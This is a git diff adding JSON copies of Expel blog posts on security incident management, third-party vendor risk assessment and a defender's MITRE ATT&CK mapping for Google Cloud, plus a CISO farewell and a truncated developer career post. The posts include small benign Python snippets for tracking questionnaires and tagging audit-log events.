+} \ No newline at end of file diff --git a/a-cheat-sheet-for-managing-your-next-security-incident.json b/a-cheat-sheet-for-managing-your-next-security-incident.json new file mode 100644 index 0000000000000000000000000000000000000000..915a9d62330c3c02bd70cdc23c6ea374c3660df2 --- /dev/null +++ b/a-cheat-sheet-for-managing-your-next-security-incident.json @@ -0,0 +1,6 @@ +{ + "title": "A cheat sheet for managing your next security incident", + "url": "https://expel.com/blog/cheat-sheet-managing-next-security-incident/", + "date": "Aug 24, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG A cheat sheet for managing your next security incident Tips \u00b7 5 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 24, 2017 \u00b7 TAGS: Planning / Security Incident Surviving the unexpected. On the face of it, security is pretty straightforward. We\u2019re operating in one of two modes. In Mode A we\u2019re focused on keeping evildoers at bay (and other generally bad things from happening). In Mode B the bad things have happened and we\u2019re doing the best we can to manage them. For most people A > B. But we don\u2019t get to choose when the bad guys show up. When they do , we\u2019re often out of practice because we have so much less experience responding to attacks than we do preparing for them. In a perfect world, there\u2019s a comprehensive incident response plan that involves legal, communications, the board, and technical response processes. In an even more perfect world, you\u2019ve put that plan through a table-top exercise, refined it based on your learnings, and drilled it to the point of muscle memory. But few of us live in that perfect world. That\u2019s OK. All is not lost. If you haven\u2019t yet got that perfect incident plan in place you can still make the best of a bad situation and manage your organization back on level ground. Here are six things I recommend. 1. Control your emotions and the velocity First and foremost, it\u2019s important not to freak out. Your job is to manage the incident in front of you and return the organization to \u201cnormal.\u201d Letting your emotions get the better of you will just get in the way of reaching that goal. It may be difficult to settle your emotions, but there are ways to help. First, get organized by putting a set of facts and tasks together to help you focus on the event at hand rather than the emotions surrounding it . Also, take care of yourself. Eat. Rest. Don\u2019t be afraid to take a step back (or a walk around the block) once in a while. It will help you maintain perspective and control your emotions. Pace of response is also important. You need to drive response activities but \u2013 like Icarus \u2013 you\u2019ll only be successful if you stay away from the extremes. Move too fast and you\u2019ll have wasted work, missed opportunities and poor decisions that could make you look like the Keystone Cops . Move too slowly, and you\u2019ll jeopardize the integrity of your organization as attackers continue to have access and do damage. There\u2019s no clear rule of thumb here, but as each meeting goes by and each day passes, make sure you\u2019re thinking about the velocity of activities and adjust tasking appropriately. 2. Build a team and assign roles You can\u2019t respond to an incident all by yourself. No matter how big or small your organization is, you need help. Build a team that\u2019s appropriate for the response and assign everyone discrete roles. 
Without roles, you\u2019ll have people stepping on each other\u2019s toes and gaps where there should be work. You\u2019ll want to engage legal, communications, key executives, IT leaders and technical staff. Make sure each person knows what they\u2019re expected to do, the level of effort and the need for confidentiality. But be careful. Don\u2019t bring in too many people \u2013 especially if you\u2019re dealing with an insider incident. Controlling information gets harder as more people get involved. So, think carefully about who you involve when insiders are involved. 3. Communication is key Regular meetings are important to keep everyone on the same page. You\u2019ll be bringing together individuals from across the organization. They don\u2019t normally work together and they won\u2019t be familiar with each other\u2019s communication styles or skills. By meeting at least once or twice a day, you\u2019ll help the team integrate rapidly and ensure your response activity doesn\u2019t suffer from lack of information sharing. And while internal communication is critical, make sure you\u2019re also looking beyond your own four walls to your customers, vendors, board, and the public at large. Controlling the message while an incident is unfolding is difficult. And it shouldn\u2019t be your responsibility \u2013 not just because you\u2019re busy, but because you are probably not good at it. Being transparent but also communicating facts externally in a way that is consistent with your brand is complicated. Educate your communications staff about the incident and hold them accountable to message with the appropriate parties. 4. Don\u2019t jump to conclusions Nothing is worse than a public statement about an incident that later has to be completely changed because an organization made an assumption during an incident that turns out to be false. I was once pulled away from a vacation with my family because my corporate website was \u201cunder attack\u201d according to our network operations center. We spent half a day working with that hypothesis, trying to shore up our DDoS defenses and control traffic. When we actually stepped back and looked at the facts, we discovered our marketing department had launched a new ad campaign without telling IT. It was swamping us with new users. Within a few minutes, we contacted marketing and had them turn the dial down to levels our infrastructure could handle. Deal with the facts you have, not the facts you want or the assumptions you brought to the table. Jumping to conclusions without sufficient facts damages your creditability with stakeholders. More important, it can lead to poor assignment of resources and cause greater harm to your organization as attackers are allowed continued room to operate. 5. Save the post-mortem for the actual \u201cpost\u201d While you\u2019re figuring out \u201cwhat\u201d happened, it\u2019s often easy to drift into thinking about \u201cwhy\u201d it happened. Assigning blame and tracking down the root cause of an incident may seem like a good idea, but it can inflame emotions and distract you from the task at hand. If you see your teammates diving into the \u201cwhy\u201d of the incident, remind them that the team will do a post-mortem after the incident and ask them to stay focused on their tasking. Usually, the promise of the post-mortem is enough to keep things on track. Then, once the incident is resolved, make sure you actually do the post-mortem analysis. 
Addressing the root cause of an event is important to the long-term integrity of your organization. Give everyone a few days to rest and deal with their normal job functions, but try to have a post-mortem meeting within a week after the event. 6. Start building a real incident response plan When the dust has settled, sit down with all your notes, emails, and random facts. Marvel that you were able to deal with such a complex situation with nothing but your wits and your skills. And vow to never, ever do it like that again. Creating a solid incident response plan will ensure that when things go wrong again (and they will go wrong) that your organization is better prepared to deal with the event. Did you notice something? None of these recommendations are overly technical. In my experience, when incident response goes wrong it\u2019s not because there wasn\u2019t competent technical staff. It\u2019s because there was no clear leadership for the staff to follow. \u2014 So today, while you\u2019re still working on your full incident response plan (and before anything bad has happened) let me offer a three-minute plan and a three-hour plan that will leave you better prepared to manage your organization the next time you face an incident. If you\u2019ve only got three minutes: get your phone out, make a list of the people across the organization that you\u2019ll need to work with if an incident happens and make sure you have them on speed dial. If you\u2019ve got three hours go a step further: set up meetings with each of them and tell them what their role would be if an incident ever arises. Trust me, the time you spend doing this will be paid back tenfold when that time is most valuable \u2013 during your next incident." +} \ No newline at end of file diff --git a/a-common-sense-approach-for-assessing-third-party-risk.json b/a-common-sense-approach-for-assessing-third-party-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..4c804f797ea4b13ec17197b1533e1395181c0806 --- /dev/null +++ b/a-common-sense-approach-for-assessing-third-party-risk.json @@ -0,0 +1,6 @@ +{ + "title": "A common sense approach for assessing third-party risk", + "url": "https://expel.com/blog/a-common-sense-approach-for-assessing-third-party-risk/", + "date": "Jul 26, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG A common sense approach for assessing third-party risk Security operations \u00b7 12 MIN READ \u00b7 BRUCE POTTER \u00b7 JUL 26, 2018 \u00b7 TAGS: Example / How to / Planning \u201cHow secure is your supply chain?\u201d It\u2019s a question that can strike terror into the heart of a CISO \u2013 even one who\u2019s in charge of a mature security organization. With the move (sprint?) to cloud-based infrastructure, and business departments subscribing to SaaS apps left and right (\u201cOops! was I supposed to tell IT?\u201d), every day we rely more and more on other peoples\u2019 services to serve our customers. Here at Expel, we\u2019re a \u201ccloud first\u201d organization. Our entire enterprise\u2019s physical infrastructure fits easily on one desk. But we use the capability of nearly 50 vendors to bring our services to our customers. That\u2019s a lot of infrastructure that\u2019s not ours. And we\u2019re a relatively small company. Large companies may depend on hundreds of outside services. Understanding how all those services keep their customers (meaning \u2026 you) secure is no trivial matter. But it\u2019s super important. 
CISOs manage cyber risk in their own infrastructure every day. But once you leave your own infrastructure, it gets harder. And there aren\u2019t a lot of playbooks for how to manage the risk of someone else\u2019s infrastructure. Third parties are out of your control. You give them money, they provide a good or service in return. Sometimes, there\u2019s even contractual language that says \u201cwe\u2019ll do our best to secure your data.\u201d But, in practice, those words don\u2019t really mean much. What matters is the practices, procedures, and policies your vendors follow. At Expel, like many companies, we\u2019ve created a third-party assessment program for our vendors to try to manage our supply chain risk. We\u2019ve used other companies\u2019 third-party assessment programs as input, consulted our vendors and done a lot of research. It works well for us, and so we\u2019re sharing it with you, along with the third-party risk assessment questionnaire we\u2019ve developed. Watch the video overview \u2026 or keep scrolling to read on First \u2026 be realistic about who chooses your suppliers Unfortunately (at least for CISOs), security doesn\u2019t control who the organization does business with. Business owners do. And the questions they have on their mind are very different than what most CISOs are wondering. As you roll your program out, it\u2019s important to understand the business owner\u2019s mindset so you can figure out when, where and how to insert your own process into theirs. When a business owner has a problem, they probably want to fix it fast. They want to know if the product or service they\u2019ve got their eye on will do the trick. If the answer is \u201cyes\u201d (and they\u2019ve got the budget) they\u2019ll move forward, negotiating contracts, agreeing on cost and ultimately making the purchase. Meanwhile, the CISO is thinking, \u201cDoes this vendor create an acceptable level of risk?\u201d Getting answers means acting fast \u2013 while the business owners are chasing down answers to their own questions. If a potential vendor doesn\u2019t address security in a way you\u2019re comfortable with, the sooner you know that the better. It\u2019s much easier to guide the business away from potentially toxic companies early in the process than to stop a contract that\u2019s gone through all the redlining and negotiation and is one inch from the finish line. Next \u2026 set realistic expectations (aka understand the constraints) Setting realistic expectations for your third-party assessment program requires understanding two important equations that\u2019ll govern how much time you and your vendors are willing to put in. They seem simple. But it\u2019s easy to get so caught up in the weeds perfecting your process that you lose sight of them. Violate equation number one and vendors will start stretching the truth to get through all of your questions or bury the bad stuff to try and get your business. Violate the second equation and you\u2019ll find yourself giving away a free risk assessment or pen test to every potential vendor (more on that later). Remember, SaaS providers are getting bombarded left and right with third-party assessments. Short, easy questionnaires will get their attention before long complex ones. Likewise, you don\u2019t have a lot of time to dedicate to this either. The more complex the questions, the longer you\u2019ll have to spend vetting the results. 
Short, simple and to the point is far more likely to get to a result that\u2019s useful \u2013 both for you and your vendors \u2013 than some crazy, multi-page questionnaire. Keeping things simple has multiple benefits. When in doubt, use the \u201c50 at 50\u201d rule Striking the balance between thorough yet brief, reminds me of a saying from when I used to crew for a friend that raced cars out in West Virginia. The sanctioning body for the races required that cars be painted in a professional manner. Anyone that\u2019s been around amateur racing knows that very little about it qualifies as \u201cprofessional.\u201d The rule of thumb the officials used was \u201c50 at 50\u201d\u2026 that is, when you looked at a car traveling 50 miles per hour from 50 feet away, did the car look like it was painted? If the answer was \u201cyes,\u201d you were good to race. That\u2019s sort of how I view third-party assessments. If your process gives you the same level of assurance about your vendors\u2019 security processes as \u201c50 at 50\u201d gives racing officials, you\u2019re doing things right. Sure, there are some situations that require far more diligence than that (stay tuned!), but in most cases, you\u2019re just trying to get a general feel for things. Ultimately, even organizations with great practices and procedures will screw up sometimes. Nothing you do in your third-party assessment program will change that. The common sense process for third-party assessments There are three big chunks to any third-party assessment program: creating the questionnaire, designing the process and running it (told you it would be \u201ccommon sense\u201d). Of course, not every situation will fit neatly into your process. We\u2019ll cover the outliers too. But, to get started, you need to create your questionnaire. 1. Creating your questionnaire The questions you ask your vendors will be taken seriously by them \u2026 or at least they\u2019ll look at them seriously and try to figure out what you mean. It\u2019s important to write crisp, clear questions that vendors can easily understand and have a clear way to answer. The meat of your questionnaire is the questions themselves. We\u2019re providing our third-party risk assessment questionnaire as a starting point for you. Hopefully this\u2019ll let you speed through this step. We like these questions because they cover a wide swath of cybersecurity without being too detailed. They\u2019re also aimed at making it easy for vendors to re-use work they\u2019ve already done. Asking about existing certifications and the results of previous testing reduces friction in the process. Really, we want to ask questions we think will get answered truthfully and quickly. Focusing on reuse is one strategy for that. We\u2019ve also designed our questionnaire to sleuth out how much thought and care a vendor has put into security in general. For example, when we ask \u201cDo you have a formally appointed information security officer?\u201d we get a different vibe when the answer is \u201cYes, here\u2019s our CISO\u2019s contact info,\u201d versus \u201cNot really. Our lead developer cares a lot about security though.\u201d Simple questions like this give you a great window into how a potential vendor thinks about security. 2. Building the process Developing the questions is only one piece of the prep work that you\u2019ll need to do. How you\u2019re actually going to manage the process is equally important. 
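Before moving on to the process side, one small trick for keeping the questionnaire short and easy to score is to treat it as structured data instead of a document. The questions and red-flag answers below are illustrative only, not a recommended list.

```python
# Toy questionnaire: a handful of questions plus the answers that warrant follow-up.
questionnaire = [
    {"q": "Do you have a formally appointed information security officer?",
     "red_flags": ["no", "not really"]},
    {"q": "Can you share a recent SOC 2 report or equivalent?",
     "red_flags": ["no"]},
    {"q": "When was your last third-party penetration test?",
     "red_flags": ["never"]},
]

# A vendor's (made-up) answers, keyed by question text.
answers = {
    "Do you have a formally appointed information security officer?": "Not really",
    "Can you share a recent SOC 2 report or equivalent?": "Yes, under NDA",
    "When was your last third-party penetration test?": "Q1 2018",
}

for item in questionnaire:
    answer = answers.get(item["q"], "").strip().lower()
    if any(flag in answer for flag in item["red_flags"]):
        print("Follow up:", item["q"], "->", answers[item["q"]])
```

Now, on to the process itself.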
The process we\u2019ve designed breaks down into the following six steps. Your exact process will, no doubt, have to be tailored a bit to the way your organization buys products and services. We\u2019re not suggesting that you can do a direct cut-and-paste of our process. But hopefully it can be an advanced starting point for you. Here\u2019s a quick overview of how we thought about each step as we created our own third-party assessment process. Step 1: Kicking off the process We created a set of criteria to determine which external vendors need to go through the process. Vendors that make the cut include: Services that will impact production systems Services that contain customer or other sensitive data Systems which aggregate data from multiple data sources. If someone is trying to use a new service that fits one of these situations, they send a request for review to a security review email alias containing what the service is, how we\u2019re going to use it and provide points of contacts at the vendor. Step 2: Send an introduction It\u2019s a bit awkward to send an email to a potential vendor demanding a bunch of information without first introducing yourself, the process and what they should expect. At Expel, the first thing we send to the vendor is a cordial email describing our process, the relatively casual and light touch nature of it and an invitation to ask questions or engage if they have concerns. We also let them know our desired timeliness (usually we ask for a response within about two weeks). Step 3: Send the real email Next, we send the real email. We use our secure file sharing system to send this email so that all communications are encrypted and their response is protected on its way back to us. You don\u2019t have to do this, but it\u2019s advisable, especially if you\u2019re asking for copies of sensitive documents such as their SOC2 and pen test executive reports. Step 4: Send a reminder After a week and a half has gone by, we\u2019ll send a gentle reminder if we haven\u2019t heard anything. That\u2019s usually enough prodding to get us answers right under our two week request. Step 5: Receive and analyze the results Hopefully, when you get the vendor\u2019s answers back they make sense, are reasonably complete and if you\u2019re lucky they\u2019re even comprehensible. Sometimes we\u2019ve had to go back to ask vendors for clarification on an answer or two, and that\u2019s OK. Keeping in mind the \u201c50 at 50\u201d mentality, once you have the answers, balance them against the business request and determine if you\u2019re willing to move forward with the vendor or if there are concerns that need to be addressed. Step 6: Brief the business owner(s) Once we\u2019ve got our heads around all of the vendor\u2019s answers, we give the business owner our opinion. When the results are positive, the conversations are easy. When we have concerns, that\u2019s when things get more difficult. It\u2019s a good idea in those cases to involve more people on the business side than just the requester (team leads, managers, etc.). You\u2019re going to get into a risk-oriented decision about how important this specific vendor is to the company and what the security risks are. The results of that meeting can vary wildly, but usually will fall into one of four buckets: Yep. Cool. Go for it. We can put in compensating controls to make up for lack of assurance in the vendor. We need a deeper dive to better understand the risks. No. Nope. Negative. Not going to use them. 
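If you are wondering how to keep track of all this, a plain record per vendor is usually enough: when the questionnaire went out, when to send the step-4 nudge, and which of the buckets above you landed in. A minimal sketch with invented data, using thresholds that match the timelines described above.

```python
from datetime import date, timedelta

# One record per vendor assessment; vendors, dates and outcomes are invented.
assessments = [
    {"vendor": "ExampleSaaS", "sent": date(2018, 7, 2), "outcome": None},
    {"vendor": "OtherVendor", "sent": date(2018, 6, 18),
     "outcome": "go, with compensating controls"},
]

REMINDER_AFTER = timedelta(days=10)  # the "week and a half" gentle reminder
DUE_AFTER = timedelta(days=14)       # the two-week response window

today = date(2018, 7, 13)
for a in assessments:
    if a["outcome"] is not None:
        continue
    age = today - a["sent"]
    if age >= DUE_AFTER:
        print(a["vendor"], "-- overdue, loop in the business owner")
    elif age >= REMINDER_AFTER:
        print(a["vendor"], "-- send the gentle reminder")
```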
It\u2019s very important not to treat these decisions as binary. The reason you\u2019re doing a third-party assessment in the first place is to manage risk. Risk is a continuum, as it were, and you should treat your third-party vendor assessment process the same way. 3. Running the process Once you\u2019ve got your questionnaire and process figured out, test it on a few vendors. Be very up-front with them; let them know this is your first time trying out your third-party vendor assessment questionnaire and you\u2019d love feedback on both the material itself and the overall process. You\u2019ll find some vendors are well prepared for these kinds of requests and will have a team dedicated to answering them. Other vendors will respond with \u201chuh, this is the first time anyone\u2019s asked us about security.\u201d Be prepared for that and everything in between. Take any feedback you get and stir it inappropriately with the work you\u2019ve already done and your objectives for your third-party assessment program. After you\u2019ve tested the process on a few vendors (or later \u2026 run the process for a year or two), iterate. Feel free to change it up. As you grow, your risk appetite changes. As the state of the art of your vendors improves, you might want to modify your process to suit your needs. You don\u2019t need a forever \u201capples to apples\u201d comparison over the years. Rather, you need each response to provide you the information you need right now to make the decision that\u2019s in front of you. That information will change over time, and your process should too. Keeping track of the results You\u2019ll likely get lots of confidential documents back from your vendors when they reply to your questionnaire. You\u2019ll want to make sure you protect them according to the terms of any non-disclosure agreements you signed with them. Be sure to follow whatever your internal procedures are with respect to protecting that information. Also, we\u2019ve found that it\u2019s helpful to create one place to track all of the assessments \u2013 upcoming requests, active ones, and assessments we\u2019ve completed. We store all the responses, supporting documents and our notes in one place. We\u2019ve chosen Confluence for that since we use the Atlassian suite for a lot of our engineering and security workflow already. You should choose whatever makes sense in your organization. But be aware, you\u2019ll build up quite a pile of information quickly, so being organized early will pay off as your program grows. Hooking the process into the way your organization buys stuff Having a process is all well and good. But, unless you socialize it and have a clear way to plug it into the way your organization buys stuff, your third-party assessment program can quickly turn into shelfware. It\u2019s important to set the hook early in the process to get the best results. That hook can take many shapes: The procurement process: When a business unit requests a new PO, your purchasing department can simply ask, \u201cWhat does Security think of this?\u201d Knowing a PO won\u2019t be cut unless there\u2019s a clear answer to that question will force business owners to engage your process early so you\u2019re not playing catch up. Contract review: A slightly different take, but the same basic idea. When a contract is put in front of legal to review, they can ask, \u201cWhat does Security think of this?\u201d as well. 
Again, if business owners know they can\u2019t get through legal without clearing security, they\u2019re going to engage you early. That\u2019s just the way it is: Rather than have a specific gate, you can communicate with leaders and purchasers that new products and services are subject to a third-party assessment as part of doing business. If it\u2019s discovered that someone bought something without an assessment, There Will Be Consequences\u2122. Just like there are when people buy product outside of purchasing, right? Right? Whatever you decide, be sure to communicate it widely and often. New processes that affect how you buy services tend to take a while for everyone to understand and accept, so putting together a good PR campaign can\u2019t hurt your cause. Also, be sure the \u201chow to submit\u201d part of your process is clear. At Expel we use Jira\u2019s Service Desk as the portal where users can submit third-party assessment requests and track progress. We already use Service Desk for IT and other ticket tracking so it was an easy solution. YMMV and all that\u2026 be sure to choose a method of engagement that works for you and your company. Vendors that are bigger than your breadbox There may be times when the product or service you\u2019re evaluating is too big, too important or represents too much risk to apply the \u201c50 at 50\u201d rule. In these cases, you\u2019ll likely end up doing a more formal risk assessment to understand the risks they present in more depth so you can compensate for any issues you can\u2019t get the vendor to fix. Risk assessments are complicated (I addressed them in an O\u2019Reilly Security talk here if you\u2019re interested). They can be done either by your own staff or a third party. Either way, I have two points of caution: Don\u2019t give out a free pen test If you engage a third party to assess your vendor\u2019s product it\u2019s easy for your vendor to ultimately get a free pen test that you unwittingly pay for. So, if you hire a third party, make sure they\u2019re working on your behalf and use your business needs as the backstop for their work. That\u2019ll make sure the final product is geared towards you and your business, not the vendor and their product. Make sure you don\u2019t accidentally do a pen test or risk assessment The other common mistake when you dive deeper is you don\u2019t realize that you\u2019re diving deeper. You get the questionnaire back and you have questions \u2026 so you ask the vendor a few more questions. Things are clearer, but still not clear. So, you ask \u201cHey, can we take it for a test drive?\u201d You get their product, configure it, start testing it and suddenly realize you\u2019re doing a product assessment and you\u2019re already 40 hours into the process and probably have 80 more hours to go before you\u2019re done. As you start peeling back the onion be aware that you\u2019re doing it overtly and for a reason. Don\u2019t spend more time and effort on a third-party assessment than you need to. Oh \u2026 and make sure to avoid these common pitfalls Finally, there are a couple of other pitfalls you\u2019ll want to make sure you avoid as you launch (or refine) your third-party vendor assessment program. Adding to the questionnaire Be wary of asking too many questions or diving too deep. You\u2019ll quickly reach a point where vendors don\u2019t want to answer and it takes you too long to assess the results. It\u2019s not worth it. 
If you decide to do a full-fledged risk assessment, then by all means, dive in the deep end. But if you\u2019ve got a question you feel you must add to your questionnaire, find one (or two?) that aren\u2019t giving you any value and swap them out. Again, the simpler and shorter your questionnaire is, the more likely you\u2019ll get accurate and timely responses. Believing all the answers It\u2019s human nature to not want to fail tests. That applies to vendors responding to third-party assessment requests. They want to be as compliant as possible, so you can expect they\u2019ll take a few liberties in their answers. While it\u2019s unusual to find a vendor that flat out lies (saying they\u2019re SOC2 Type 2 compliant when they\u2019re not, for example), you may find vendors occasionally stretch the truth enough to \u201cpass.\u201d So, when you\u2019re answering the question \u201cAm I OK using this vendor,\u201d assume their answers are eighty percent correct. That\u2019s it There you go. That\u2019s Expel\u2019s third-party vendor assessment program in a nutshell. There are many like it, but this one is ours. Hopefully it gives you a jump start on building your own program. Please, take a look at our questionnaire , and feel free to use, modify, and comment on it as you see fit. I\u2019d also suggest taking a look at our NIST cybersecurity framework self-scoring tool that I created. It allows you to create charts that show your current and future security posture based on the NIST CSF and it includes a section on supply chain risk. If you do have comments and you\u2019d like to share on this process, the questionnaire or the NIST tool, please reach out to us and let us know. We\u2019re always trying to improve and would love for you to help us with that." +} \ No newline at end of file diff --git a/a-defender-s-mitre-att-ck-cheat-sheet-for-google-cloud.json b/a-defender-s-mitre-att-ck-cheat-sheet-for-google-cloud.json new file mode 100644 index 0000000000000000000000000000000000000000..f11ee53417f79ab6c1149f04c816747f9f3c3986 --- /dev/null +++ b/a-defender-s-mitre-att-ck-cheat-sheet-for-google-cloud.json @@ -0,0 +1,6 @@ +{ + "title": "A defender's MITRE ATT&CK cheat sheet for Google Cloud ...", + "url": "https://expel.com/blog/mitre-attack-cheat-sheet-for-gcp/", + "date": "Aug 5, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG A defender\u2019s MITRE ATT&CK cheat sheet for Google Cloud Platform (GCP) Security operations \u00b7 2 MIN READ \u00b7 KYLE PELLETT \u00b7 AUG 5, 2022 \u00b7 TAGS: Cloud security / MDR Our security operations center (SOC) sees its share of attackers in Google Cloud Platform (GCP). Seriously\u2014check out this recent incident report to see what we mean. Attackers commonly gain unauthorized access to a customer\u2019s cloud environment through misconfigurations and long-lived credentials\u2014100% of cloud incidents we identified in the first quarter of 2022 stemmed from this root cause. As we investigated these incidents, we noticed patterns emerge in the tactics attackers use most often in GCP. We also noticed those patterns map nicely to the MITRE ATT&CK Framework \u2026 (See where we\u2019re going with this?) Cue: our new defender\u2019s cheat sheet to MITRE ATT&CK in GCP. What\u2019s inside? In this handy guide, we mapped the GCP services where these common tactics often originate to the API calls they make to execute on these techniques, giving you a head start on protecting your own GCP environment. 
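To make that mapping idea concrete, here's a minimal sketch of what it looks like in practice: a lookup from Cloud Audit Log method names to the ATT&CK tactics they commonly signal, applied to a parsed log entry. The specific method names and tactic pairings below are illustrative picks for this sketch, not a copy of the cheat sheet.

```python
# Illustrative only: map a few GCP Cloud Audit Log method names to the ATT&CK
# tactics they commonly signal. These pairings are examples for this sketch,
# not the contents of the cheat sheet itself.
METHOD_TO_TACTICS = {
    "google.iam.admin.v1.CreateServiceAccountKey": ["Persistence", "Credential Access"],
    "SetIamPolicy": ["Privilege Escalation"],
    "v1.compute.instances.insert": ["Execution"],
    "storage.objects.list": ["Discovery"],
}


def tag_log_entry(entry: dict) -> list:
    """Return candidate ATT&CK tactics for one audit log entry.

    Assumes the entry has been parsed into a dict that keeps the
    protoPayload.methodName structure Cloud Audit Logs use.
    """
    method = entry.get("protoPayload", {}).get("methodName", "")
    return METHOD_TO_TACTICS.get(method, [])


if __name__ == "__main__":
    sample = {"protoPayload": {"methodName": "SetIamPolicy"}}
    print(tag_log_entry(sample))  # ['Privilege Escalation']
```

Even a tiny lookup like this turns "which API calls matter?" into a question your triage tooling can answer for you.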
We also sprinkled in a few tips and tricks to help you investigate incidents in GCP. It\u2019s an easy-to-use resource that informs your organization\u2019s GCP alert triage, investigations, and incident response. Our goal? Help you identify potential attacks and quickly map them to ATT&CK tactics by providing the lessons learned and takeaways from our own investigations. Depending on which phase of an attack you\u2019re investigating, you can also use the cheat sheet to identify other potential attack paths and tactics the cyber criminal used, painting a bigger (clearer) picture of any risky activity and behaviors that can indicate compromise and require remediation. For example, if you see suspected credential access, you can investigate by checking how that identity authenticated to GCP, if they\u2019ve assumed any other roles, and if there are other suspicious API calls indicating the presence of an attacker. Other tactics that an attacker may execute prior to credential access include discovery, persistence, and privilege escalation. What\u2019s the bottom line? Chasing down GCP alerts and combing through audit logs isn\u2019t easy if you don\u2019t know what to look for (and even if you do). Full disclosure: the cheat sheet doesn\u2019t cover every API call and the associated ATT&CK tactic. But it can serve as a resource during incident response and help you tell the story (to your team and customers) after the fact. Knowing which API calls are associated with which attack tactics isn\u2019t intuitive, and we don\u2019t think you should have to go it alone. We hope this guide serves as a helpful tool as you and your team tackle GCP incident investigations. Want a defender\u2019s cheat sheet of your own? Click here to get our GCP mind map! P.S. Operating in Amazon Web Services (AWS) or Azure too? We didn\u2019t forget about you\u2014check out this AWS Mind Map and Azure Guidebook for more helpful guidance. Special thanks to Ryan Gott for his contributions to this defender\u2019s cheat sheet and mind map." +} \ No newline at end of file diff --git a/a-tough-goodbye.json b/a-tough-goodbye.json new file mode 100644 index 0000000000000000000000000000000000000000..7862b8a32e81a663da01daf4b36c371cb4b0483a --- /dev/null +++ b/a-tough-goodbye.json @@ -0,0 +1,6 @@ +{ + "title": "A tough goodbye", + "url": "https://expel.com/blog/a-tough-goodbye/", + "date": "Aug 10, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG A tough goodbye Expel insider \u00b7 2 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 10, 2021 \u00b7 TAGS: Company news After nearly five years serving as Expel\u2019s CISO (pronounced \u201cciz-oh,\u201d for those wondering), I\u2019m moving on to new adventures. But before I leave, I wanted to share a bit about my journey with Expel. Expel is an incredible company. I honestly mean that. Even from the beginning, Expel impressed me. In 2016, I had the opportunity to be the technical advisor to the Obama administration\u2019s Commission on Enhancing National Cybersecurity. It was a fascinating experience, to be sure. One of the things I heard from all the companies and agencies I interacted with was that many of them had a similar shared experience that can be best summed up like this: \u201cI\u2019ve done everything I\u2019m supposed to do and bought all the tech I\u2019m supposed to buy. 
I still don\u2019t feel like I see what\u2019s happening in my environment, and don\u2019t think my provider is actually finding the bad things.\u201d At the time, I remember thinking, \u201cYep, that\u2019s how it is,\u201d and I didn\u2019t have any real ideas on how to do better. How it started I got a call from Yanek, one of Expel\u2019s founders, who was on the hunt for a CISO for this new company he was helping to start and was hoping I might have some recommendations. Always happy to help a friend, I asked him what Expel was doing and told him I\u2019d see if I could find anyone who might be interested. He told me the plan for Expel: The founders wanted to disrupt the managed security space, hook into existing investments companies have made and automate not just the detection but also the investigative and recommended remediation activities. After listening to the pitch, I thought, \u201cThat\u2019s it! That\u2019s the thing nearly everyone I\u2019ve talked to in the last year needs.\u201d I offered up that I\u2019d be willing to be Expel\u2019s CISO. I interviewed with the other execs (including a really memorable one with Pete Silberman), and I ended up with the job\u2026even if we couldn\u2019t agree on how to pronounce C-I-S-O. How it\u2019s going Fast forward almost five years, and it\u2019s been a blast. Seeing the initial vision of the company come to fruition is awesome. I\u2019ve had customers tell me our service has changed their lives; that they finally get to see their kids\u2019 sporting events for the first time in forever\u2026I\u2019ve seen companies grow and build their internal security programs without having to deal with the day-to-day stress of security operations. And I\u2019ve seen Expel grow too. This company has always been an incredible place to work, a place where everyone supports each other both professionally and personally. In my role as CISO, I oversee not just security, but IT and facilities as well. I can\u2019t overstate the quality of work done by this team. We\u2019ve published some of the work we\u2019ve done (like our 3PA process , the NIST CSF self-scoring tool and NIST Privacy Framework self-scoring tool ) but there\u2019s lots of good work this team has done that the public doesn\u2019t get to see. I\u2019m thankful for them and so proud of their work. Although I\u2019m off to a new adventure and excited about the future, it\u2019s safe to say I\u2019ll miss Expel and its band of merry Expletives. Thanks and see you around To our customers: I\u2019m happy we\u2019ve been able to make a difference for you. To my coworkers, I\u2019ve enjoyed working with all of you and you\u2019ve made me a better person during my time at Expel. And to my family, thanks for your support on this adventure and the next one. I\u2019m not going far \u2014 if you want to chat about third-party risk (that\u2019s a great topic for cocktail parties, by the way) or just say hello, you can still find me in your favorite CISO Slack community, at ShmooCon and on Twitter." 
+} \ No newline at end of file diff --git a/a-year-in-review-an-honest-look-at-a-developer-s-first-12.json b/a-year-in-review-an-honest-look-at-a-developer-s-first-12.json new file mode 100644 index 0000000000000000000000000000000000000000..e1bbeb4ee9959db6bf405e7dd1ca03a9318114ed --- /dev/null +++ b/a-year-in-review-an-honest-look-at-a-developer-s-first-12.json @@ -0,0 +1,6 @@ +{ + "title": "A year in review: An honest look at a developer's first 12 ...", + "url": "https://expel.com/blog/developers-first-12-months-at-expel/", + "date": "Aug 16, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG A year in review: An honest look at a developer\u2019s first 12 months at Expel Talent \u00b7 8 MIN READ \u00b7 DAREN MCCULLEY \u00b7 AUG 16, 2022 \u00b7 TAGS: Careers / MDR At Expel, it should be no surprise that we value transparency. It\u2019s one of those core beliefs that makes us tick. One way we practice transparency is by providing open and candid insights into our interview and onboarding process, but what about beyond the first 90 days? Well, let\u2019s talk about it\u2014because that\u2019s what we do here. Recently, senior software engineer, Daren McCulley, used his Expel-oritory Time\u2014more on this later\u2014to reflect on his first year as a new developer at Expel. In this post, learn about Daren\u2019s experience with the interview process, major takeaways from the early days, and the personal and professional growth that came along the way. The goal? We hope that providing a peek behind the curtain will help you make the most informed decision when deciding if becoming an Expletive is right for you. Take it away, Daren! Let\u2019s start at the beginning When I think back to the interview process with Expel, what I remember most is that I was never in the dark about what was next or where I stood. In contrast to the other interviews I\u2019d been through, the process was transparent, respectful of my time, and gave me a window into Expel\u2019s culture. Our technical interviews are collaborative experiences, rather than inquisitions by whiteboard. It only took two weeks to go from my initial screen to my final interview, and my recruiter extended an offer that same evening\u2014allowing me plenty of time to compare it with offers from other companies. The thoughtfulness given to my personal circumstances\u2014understanding that I needed to weigh all of my options to make the best choice for me\u2014was the first of many times I\u2019ve witnessed Expel demonstrate another core belief: If we take care of our crew, they\u2019ll take care of our customers. At the risk of stating the obvious, I accepted my offer. What to expect in the early days At Expel, we definitely hit the ground 